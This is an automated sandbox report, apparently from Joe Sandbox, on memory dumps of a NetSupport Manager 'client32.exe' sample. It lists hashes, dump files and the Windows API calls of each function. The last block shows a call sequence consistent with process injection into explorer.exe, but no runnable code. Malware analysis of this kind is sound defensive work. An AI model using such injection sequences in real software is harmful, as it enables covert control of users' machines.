                                                                                        • Opcode ID: 6a4558929192b251c5d08b5e804bdc9b61ce28f30961faaa03d70a9527164016
                                                                                        • Instruction ID: 622d3808cb19fe645f7705ee54a54b225289d7132215defba9e18c77360d7652
                                                                                        • Opcode Fuzzy Hash: 6a4558929192b251c5d08b5e804bdc9b61ce28f30961faaa03d70a9527164016
                                                                                        • Instruction Fuzzy Hash: FE213C75E00269EBEB40CE69C88469D7BF5FF44360F14C1AAEC55EB241D774DE408B91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: QueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3660427363-0
                                                                                        • Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                        • Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
                                                                                        • Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                        • Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754
                                                                                        APIs
                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InformationToken
                                                                                        • String ID:
                                                                                        • API String ID: 4114910276-0
                                                                                        • Opcode ID: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                                        • Instruction ID: 0dd0dc8a76de1486b7c0157bd4876b78410922a839ecfb631160e4ccf4e8658d
                                                                                        • Opcode Fuzzy Hash: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                                        • Instruction Fuzzy Hash: E1118671A0055D9BDB11CFA8DD51BEEB3E8DB48309F0041D9E9499B340EA70AE488B90
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007
                                                                                          • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 328603210-0
                                                                                        • Opcode ID: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                        • Instruction ID: 2763c535338e1a2717ceb9c309c83b7f036f5409daf397f77e32ba57fb3352a5
                                                                                        • Opcode Fuzzy Hash: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                        • Instruction Fuzzy Hash: B301D4353423A79BFB1A8E35CDA4B5BB79ABF827A4F01462DE815CB280D774D800C780
                                                                                        APIs
                                                                                        • __wcstoi64.LIBCMT ref: 1105E85D
                                                                                          • Part of subcall function 1116450B: strtoxl.LIBCMT ref: 1116452C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __wcstoi64strtoxl
                                                                                        • String ID:
                                                                                        • API String ID: 910016052-0
                                                                                        • Opcode ID: 8f26ef6fd018574ad29966309b08038d9b6a407cfa2a3251d72f04733a0025b5
                                                                                        • Instruction ID: 23ac52cab648964c8bc4f85844fc967f5549f4a308fdde8bda903d18a29afeb2
                                                                                        • Opcode Fuzzy Hash: 8f26ef6fd018574ad29966309b08038d9b6a407cfa2a3251d72f04733a0025b5
                                                                                        • Instruction Fuzzy Hash: 5F014F36A0010DABC710DFA8C941FAFB7B8DF99704F114059AD45AB280DAB1AE14D7A1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __waccess_s
                                                                                        • String ID:
                                                                                        • API String ID: 4272103461-0
                                                                                        • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                        • Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
                                                                                        • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                        • Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __fsopen
                                                                                        • String ID:
                                                                                        • API String ID: 3646066109-0
                                                                                        • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                        • Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
                                                                                        • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                        • Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585
                                                                                        APIs
                                                                                        • _NSMClient32@8.PCICL32(?,?,?,00AA10A2,00000000), ref: 00AA100B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670583223.0000000000AA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670578615.0000000000AA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670588209.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_aa0000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Client32@8
                                                                                        • String ID:
                                                                                        • API String ID: 433899448-0
                                                                                        • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                        • Instruction ID: 0230f4e93616b68af4eede61581d253b1fc29999f90b08c179267234ca86f700
                                                                                        • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                        • Instruction Fuzzy Hash: 77B092B211434DAB8714EE98E941C7B339CAA98600F040809BD0543282CA61FC609671
                                                                                        APIs
                                                                                        • RtlEncodePointer.NTDLL(00000000,11178B2B,111F29D8,00000314,00000000,?,?,?,?,?,1116E7EB,111F29D8,Microsoft Visual C++ Runtime Library,00012010), ref: 1116C48A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EncodePointer
                                                                                        • String ID:
                                                                                        • API String ID: 2118026453-0
                                                                                        • Opcode ID: 034736193946d95bcfb76139b375fa58cd735bbaf493e69cf92d6cc7d133de75
                                                                                        • Instruction ID: 85178daedb8e135e59ea49443ffa37c172a2f839626d84bfb77205dd36a12bfe
                                                                                        • Opcode Fuzzy Hash: 034736193946d95bcfb76139b375fa58cd735bbaf493e69cf92d6cc7d133de75
                                                                                        • Instruction Fuzzy Hash:
                                                                                        APIs
                                                                                          • Part of subcall function 11088BE0: IsWindow.USER32(111314CC), ref: 11088BFC
                                                                                          • Part of subcall function 11088BE0: IsWindow.USER32(?), ref: 11088C16
                                                                                        • LoadCursorA.USER32(00000000,00007F02,?,B24479DC), ref: 110077EA
                                                                                        • SetCursor.USER32(00000000), ref: 110077F1
                                                                                        • GetDC.USER32(?), ref: 1100781D
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 1100782A
                                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007934
                                                                                        • SelectObject.GDI32(?,00000000), ref: 11007942
                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11007956
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 11007963
                                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007975
                                                                                        • SelectClipRgn.GDI32(?,00000000), ref: 110079A1
                                                                                          • Part of subcall function 110022D0: DeleteObject.GDI32(?), ref: 110022E1
                                                                                          • Part of subcall function 110022D0: CreatePen.GDI32(?,?,?), ref: 11002308
                                                                                          • Part of subcall function 11005B70: CreateSolidBrush.GDI32(?), ref: 11005B97
                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110079CB
                                                                                        • SelectClipRgn.GDI32(?,00000000), ref: 110079E0
                                                                                        • DeleteObject.GDI32(00000000), ref: 110079ED
                                                                                        • DeleteDC.GDI32(?), ref: 110079FA
                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007A17
                                                                                        • ReleaseDC.USER32(?,?), ref: 11007A46
                                                                                        • CreatePen.GDI32(00000002,00000001,00000000), ref: 11007A51
                                                                                        • CreateSolidBrush.GDI32(?), ref: 11007B42
                                                                                        • GetSysColor.USER32(00000004), ref: 11007B50
                                                                                        • LoadBitmapA.USER32(00000000,00002EEF,00FF00FF,00000000), ref: 11007B67
                                                                                          • Part of subcall function 11142F40: GetObjectA.GDI32(11003D76,00000018,?), ref: 11142F53
                                                                                          • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F61
                                                                                          • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F66
                                                                                          • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F7E
                                                                                          • Part of subcall function 11142F40: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11142F91
                                                                                          • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F9C
                                                                                          • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11142FA6
                                                                                          • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 11142FC3
                                                                                          • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,00000000), ref: 11142FCC
                                                                                          • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00FFFFFF), ref: 11142FD8
                                                                                          • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 11142FF5
                                                                                          • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11143000
                                                                                          • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00000000), ref: 11143009
                                                                                          • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11143026
                                                                                          • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11143031
                                                                                          • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                          • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                        • _memset.LIBCMT ref: 11007BC7
                                                                                        • _swscanf.LIBCMT ref: 11007C34
                                                                                          • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                        • CreateFontIndirectA.GDI32(?), ref: 11007C65
                                                                                        • _memset.LIBCMT ref: 11007C8C
                                                                                        • GetStockObject.GDI32(00000011), ref: 11007C9F
                                                                                        • GetObjectA.GDI32(00000000), ref: 11007CA6
                                                                                        • CreateFontIndirectA.GDI32(?), ref: 11007CB3
                                                                                        • GetWindowRect.USER32(?,?), ref: 11007DF6
                                                                                        • SetWindowTextA.USER32(?,00000000), ref: 11007E33
                                                                                        • GetSystemMetrics.USER32(00000001), ref: 11007E53
                                                                                        • GetSystemMetrics.USER32(00000000), ref: 11007E70
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007EC0
                                                                                        • SelectObject.GDI32(?,00000000), ref: 11007986
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 1109599E
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959A7
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959AE
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959B7
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959BD
                                                                                          • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959C5
                                                                                        • UpdateWindow.USER32 ref: 11007EF2
                                                                                        • SetCursor.USER32(?), ref: 11007EFF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_malloc_strrchr_swscanfwsprintf
                                                                                        • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 2635354838-2303488826
                                                                                        • Opcode ID: 62b4cc95cd42d10d0f63fe7ea1f9047839fc38052153163d95b1438e3f3c858e
                                                                                        • Instruction ID: 6182bcd3debcd054039c16ce38c58758ae1f5640e4e16b95df98d0b4ae7a1d43
                                                                                        • Opcode Fuzzy Hash: 62b4cc95cd42d10d0f63fe7ea1f9047839fc38052153163d95b1438e3f3c858e
                                                                                        • Instruction Fuzzy Hash: 5422C7B5A00719AFE714CFA4CC85FEAF7B8FB48708F0045A9E26A97684D774A940CF50
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 11127400
                                                                                        • _memset.LIBCMT ref: 1112741D
                                                                                        • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
                                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 11127455
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
                                                                                        • _strrchr.LIBCMT ref: 111274AA
                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000), ref: 111274E3
                                                                                        • WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000), ref: 1112750F
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1112751C
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000), ref: 11127537
                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
                                                                                        • wsprintfA.USER32 ref: 11127561
                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
                                                                                        • CloseHandle.KERNEL32(?), ref: 1112759E
                                                                                        • CloseHandle.KERNEL32(?), ref: 111275A7
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 111275AA
                                                                                        • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?), ref: 111275E0
                                                                                        • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
                                                                                        • DuplicateHandle.KERNEL32 ref: 11127688
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
                                                                                        • _strrchr.LIBCMT ref: 111276AB
                                                                                        • _memmove.LIBCMT ref: 11127724
                                                                                        • GetThreadContext.KERNEL32(?,?), ref: 11127744
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
